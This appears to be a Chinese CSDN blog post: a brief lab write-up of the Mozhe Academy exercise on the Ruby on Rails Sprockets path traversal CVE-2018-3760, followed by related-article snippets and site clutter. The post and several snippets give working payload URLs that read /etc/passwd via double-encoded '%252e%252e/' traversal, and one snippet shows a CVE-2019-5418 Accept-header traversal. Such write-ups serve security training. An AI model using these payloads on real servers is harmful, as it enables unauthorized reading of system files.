0x1B.Ruby On Rails漏洞复现第一题(CVE-2018-3760)

最新推荐文章于 2023-11-06 09:32:35 发布
最新推荐文章于 2023-11-06 09:32:35 发布
阅读量520 收藏 1
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 Ruby On Rails CVE-2018-3760
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/102549557
版权

构造payload,读取/etc/passwd文件;
http://219.153.49.228:46944/assets/file:%2f%2f/etc/passwd

passwd在黑名单中,不被允许访问,但是报错信息中给出了允许访问的目录,通过使用允许访问的目录可以跳转到/etc/passwd;

payload如下:http://219.153.49.228:46944/assets/file:%2f%2f/usr/src/blog/app/assets/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

漏洞详情:

https://www.seebug.org/vuldb/ssvid-97466

半情调
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-3760漏洞复现(任意文件读取)
千寻的博客
01-07 4068
CVE-2018-3760漏洞复现(任意文件读取) 0x00 漏洞介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它使用链轮作为开发环境中的静态文件服务器。Sprockets是一个编译和分发静态资源文件的Ruby库。 在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。 0x...
墨者靶场 Ruby On Rails漏洞复现第一CVE-2018-3760
曹振国的博客
06-09 532
Ruby On Rails介绍:解方向:关于【CVE-2018-3760漏洞分析可以看这两篇文章:影响版本:漏洞复现:一、访问靶机地址二、当我们使用`/assets/file:///etc/passwd`访问,发现`//`会被过滤,尝试进行url编码三、访问`/assets/file:%2f%2f/etc/passwd`通过报错得到用户可以访问的路径四、进行二次编码进行读取,得到key值 介绍: Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态
Ruby on Rails 路径穿越与任意文件读取漏洞 CVE-2019-5418 漏洞复现
ADummy的博客
03-01 202
Ruby on Rails 路径穿越与任意文件读取漏洞CVE-2019-5418) by ADummy 0x00利用路线 ​ Burpsuite修改Accept字段—>成构造路径穿越漏洞,读取任意文件 0x01漏洞介绍 ​ 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞,读取任意文件。 影响版本 Rai
Ruby On Rails漏洞复现第一CVE-2018-3760
weixin_44281516的博客
08-03 368
墨者靶场环境 漏洞poc http://219.153.49.228:46238/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 拿到key
墨者靶场】---3、Ruby On Rails漏洞复现第一CVE-2018-3760
qq_43168364的博客
08-21 322
背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 实训目标 1、学会根据漏洞编号查找漏洞详情; 2、了解Ruby On RailsCVE-2018-3760)形成原理; 3、学习Ruby On RailsCVE-2018-3760)利用方法; 解方向 利用已知漏洞读取文件passwd 漏洞说明 Ruby On Rails在开发环境下使用Sprocket
Ruby On Rails 路径穿越漏洞(CVE-2018-3760)复现
qq_44579646的博客
03-14 238
墨者学院Ruby On Rails 路径穿越漏洞(CVE-2018-3760)复现 0x01 漏洞详情 Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上的任意文件。 0x02 漏洞利用 访问墨者学院的靶场
漏洞复现----14、Ruby On Rails 路径穿越漏洞CVE-2018-3760
七天
11-08 1268
文章目录一、Ruby on Rails 简介二、漏洞简介1、Sprockets简介三、漏洞复现 一、Ruby on Rails 简介 Ruby on Rails(官方简称为 Rails,亦被简称为 RoR),是一个使用 Ruby 语言写的开源 Web 应用框架,它是严格按照 MVC 结构开发的。它努力使自身保持简单,来使实际的应用开发时的代码更少,使用最少的配置。 Rails 的设计原则包括 “不做重复的事”(Don’t Repeat Yourself)和 “惯例优于设置”(Convention Ove
Ruby On Rails漏洞复现第二CVE-2019-5418) --目录穿越
小白鸽
07-31 526
01 背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 ({{闭合模板路径) 02 影响版本 Rails全版本 其中修复版本
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 已为该漏洞分配了CVE标识符CVE-2020-8163。 受影响的版本:rails <5.0.1不受影响:不允许用户控制本地名称的应用程序。 ...
CVE-2019-5418:CVE-2019-5418-Ruby on Rails上的文件内容披露
02-05
CVE-2019-5418是一个文件内容披露漏洞,存在于Ruby on Rails 5.0.x、5.1.x和5.2.x版本中。主要原因是Rails的ActionDispatch组件在处理某些URL时,未能正确验证和限制文件路径的访问。攻击者可以通过构造特殊的URL...
CVE-2018-1111:CVE-2018-1111 DynoRoot
05-18
CVE-2018-1111,被称为 DynoRoot,是一个针对 Ruby on Rails 应用程序的安全漏洞,该漏洞2018年被发现并公开。Ruby on Rails 是一个流行的开源 Web 开发框架,以其高效、简洁和灵活的代码结构深受开发者喜爱。然而...
rails-id.github.io:在| Ruby on Rails印度尼西亚主页
05-03
Ruby on Rails印度尼西亚主页 该存储库是网站上内容的结果:地位一般说明不要忘记捆绑Gemfile资源: $ bundle install要构建源代码: $ jekyll build要查看源代码服务,请执行以下操作: $ jekyll serve您可以在耙上...
Rails-doubletap-RCE:使用路径遍历(CVE-2019-5418)和Ruby对象反序列化(CVE-2019-5420)的Rails 5.2.2上的RCE
02-06
使用路径遍历(CVE-2019-5418)和Ruby对象反序列化的RCE on Rails 5.2.2(CVE-2019-5420) 技术分析: CVE-2019-5418- CVE-2019-5420- //hackerone.com/reports/473888 安全部门: CVE-2019-5418- //groups....
Ruby On Rails 路径穿越与任意文件读取漏洞CVE-2018-3760CVE-2019-5418)
SoulCat
04-26 1007
Ruby On Rails 路径穿越与任意文件读取漏洞CVE-2018-3760CVE-2019-5418) "你知道深爱是什么感觉吗?" "就像房间突然黑了,我不是去找灯而是去找他。" 漏洞概述: Ruby on Rails(或者简称 Rails)是一个 Web 开发框架,使用 Ruby 编程语言开发。而2018主要是由于rails使用Sprockets作为静态文件服务器,在 Sproc...
墨者学院 Ruby On Rails漏洞复现第一CVE-2018-3760
最新发布
人若无名,便可专心练剑
11-06 954
发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。
Ruby On Rails 路径穿越漏洞CVE-2018-3760
EC_Carrot的博客
07-23 237
漏洞简介 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。 漏洞复现 直接访问http://your-ip:3000/assets/file:%2f%2f/etc/passwd,将会报错,因为文件/etc/passwd不在允许的目录中: 我们通过报错页面,可以获得允许的目录列表。随便选择其中一个目录,如/usr/src/blog/app/assets/images,然后使用%252e%2
0x21.Apache Struts2远程代码执行漏洞(S2-007)复现
qq_31679787的博客
10-16 5229
s2-007:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行; 抓包,在age值处输入poc; poc:'+(#application)+' 判断出在age输入框存在s2-007漏洞; 输入poc查找key文件位置,得到key值; poc:%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%...
Ruby on Rails教程:第三版中文版-Web开发入门
"Ruby on Rails Tutorial, Learn Web Development with Rails, Third Edition-中文版 文字版.pdf" 是一本关于Ruby on Rails开发的中文教程,由Michael Hartl编写,旨在教授Web开发技能。这本书覆盖了从基础到高级的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值